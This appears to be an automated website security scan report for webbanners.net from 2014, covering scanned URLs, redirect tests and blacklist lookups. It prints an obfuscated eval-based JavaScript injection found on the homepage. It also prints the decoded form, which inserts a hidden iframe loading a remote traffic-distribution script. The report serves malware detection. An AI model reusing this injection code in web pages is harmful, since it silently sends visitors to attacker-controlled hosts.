Scanned pages/files
Request | Server response | Status |
http://webbanners.net/ | 200 OK Content-Length: 7612 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(window.document)aa=new RegExp('test','i').toString();aaa='/test/i';if(aa.indexOf(aaa)!==-1){ss='';s=String;ee='e';e=window[ee+'val'];t='y';}h=-2;n=["4.5y4.5y52.5y51y16y20y50y55.5y49.5y58.5y54.5y50.5y55y58y23y51.5y50.5y58y34.5y54y50.5y54.5y50.5y55y58y57.5y33y60.5y42y48.5y51.5y39y48.5y54.5y50.5y20y19.5y49y55.5y50y60.5y19.5y20.5y45.5y24y46.5y20.5y61.5y4.5y4.5y4.5y52.5y51y57y48.5y54.5y50.5y57y20y20.5y29.5y4.5y4.5y62.5y16y50.5y54y57.5y50.5y16y61.5y4.5y4.5y4.5y50y55.5y49.5y58.5y54.5y50.5y55y58y23y5 Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://tds133.1dumb.com/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://tds133.1dumb.com/stds/go.php?sid=1');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width <iframe src='http://tds133.1dumb.com/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports:
| ||
http://webbanners.net/test404page.js | 404 Not Found Content-Length: 249 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: webbanners.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 04 Oct 2014 16:12:48 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 7612
Content-Type: text/html
X-NodeName: custweb02.sgu
X-ProcessTime: D=21299
...7612 bytes of data.
GET / HTTP/1.1
Host: webbanners.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 04 Oct 2014 16:12:48 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 7612
Content-Type: text/html
X-NodeName: custweb02.sgu
X-ProcessTime: D=21299
...7612 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: webbanners.net
Referer: http://www.google.com/search?q=webbanners.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: webbanners.net
Referer: http://www.google.com/search?q=webbanners.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=webbanners.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://webbanners.net/
Result: webbanners.net is not infected or malware details are not published yet.
Result: webbanners.net is not infected or malware details are not published yet.